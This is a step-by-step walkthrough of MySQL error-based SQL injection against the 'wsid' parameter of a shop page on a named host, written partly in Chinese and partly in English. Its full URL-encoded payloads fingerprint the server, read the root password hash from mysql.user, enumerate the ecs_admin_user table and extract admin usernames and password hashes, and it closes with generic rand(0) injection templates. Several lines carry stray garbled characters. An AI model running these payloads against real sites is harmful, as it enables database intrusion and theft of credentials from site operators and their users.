判断版本号 — fingerprint the MySQL version (`@@version`) by error-based injection. The injection point in every URL below is the `wsid` parameter; each payload appends `and (1,1) > (select count(*), concat(<value>, 0x3a, floor(rand()*2)) x from (select 1 union select 2) a group by x limit 1)#`. Grouping on a key that mixes the target value with a random 0/1 provokes a duplicate-key error whose message echoes the value after the `:` (0x3a). Because `rand()` is unseeded here, the collision is probabilistic and a request may have to be repeated (contrast the seeded `rand(0)` templates in the 报错注射 section at the end). The host in the URLs is the author's test target; run these only against systems you are authorized to test.
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
判断系统 — identify the server operating system via `@@version_compile_os` (same duplicate-key trick, only the selected value changes).
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
* a! a8 ^9 E7 `0 r1 P. {8 u当前 user()/ D* ?7 q6 v. j: X0 p) S- l% H
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 database() — name of the schema the application uses. The later payloads hard-code the schema `sansan1` as `char(115,97,110,115,97,110,49)`, presumably the value this step returned.
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
root hash — read the `root` password hash from `mysql.user`; `char(114,111,111,116)` spells `root` without any quote characters, which sidesteps quote filtering. This only works when the application's DB account has SELECT on the `mysql` schema (i.e. it is over-privileged), and from MySQL 5.7.6 the `Password` column no longer exists (`authentication_string` replaced it). The duplicate-entry message truncates long values (commonly cited at 64 characters), so a hash may have to be read in pieces with `substring()`.
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
9 r5 s+ @6 A) D) A6 ] j7 F' \' S当前 数据库表名
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 user_name 字段 — enumerate columns of table `ecs_admin_user` (encoded as `char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)`) in schema `sansan1` from `information_schema.columns`; offset `limit 2,1` yields the `user_name` column used in the final payload.
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 字段 password — the same column enumeration at offset `limit 4,1`, which yields the `password` column.
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
获得 admin passwd(md5) — read `password` and `user_name` from `sansan1.ecs_admin_user`. `concat_ws(char(94), ...)` joins the two fields with `^`, and `ifnull(..., char(32))` substitutes a space for NULL so MySQL's NULL-propagating concat does not blank the whole row; step `limit 0,1` upward to walk further accounts. "md5" is the author's assumption about the hash format — confirm it from the value's length and character set before attempting to crack it.
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
报错注射 — generic error-based injection templates (not URL-encoded; `table_name` / `admin_table` are placeholders). These use the seeded `rand(0)` with `information_schema.tables` as the row source, so the duplicate-key collision is deterministic and fires on every request, unlike the unseeded `rand()` payloads above. The `uid = -1 union select 1,(...)` form requires a column count matching the original query; in the last template the `0x7e,0x27` (`~'`) wrappers mark where the value begins and ends inside the error text, and `LIMIT 21,1` walks `SCHEMATA` one schema per request.
-- Error-based extraction of version(): the inner derived table groups information_schema.tables
-- on concat(version(), floor(rand(0)*2)); with seeded rand(0) the group key collides deterministically
-- and the resulting duplicate-entry error message carries the version string.
-- table_name / uid are placeholders for the injectable query; the outer union must match its column count.
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
-- Same template as above, but the leaked value is the first username from admin_table (a placeholder);
-- step LIMIT 0,1 upward to read further rows one error message at a time.
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)